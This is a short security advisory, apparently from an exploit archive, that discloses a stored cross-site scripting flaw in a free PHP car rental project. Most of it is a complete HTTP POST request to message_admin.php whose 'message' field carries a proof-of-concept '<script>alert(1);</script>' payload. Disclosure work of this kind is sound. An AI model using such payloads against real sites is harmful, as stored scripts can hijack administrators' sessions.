Car Rental Script from projectworlds.in suffers from a cross site scripting vulnerability. Versions are not provided with this software currently.
c54fadda84fad4b944f42258942bee49
====================================================================
Car Rental Script - Stored XSS
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date: : 8/7/2020
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP
####################################################################
Description: The application allows an anthenticated user to send a msg to the app administrator, parameter message is vulnerable to XSS injections.
===[ Exploit ]===
[*] Stored Cross Site Scripting
=================================
I. Persistent XSS
POST /testing/message_admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/testing/message_admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=noml4n6pvqi6tn83i8quqebtva
Connection: close
Upgrade-Insecure-Requests: 1
message=<script>alert(1);</script>&send=Send+Message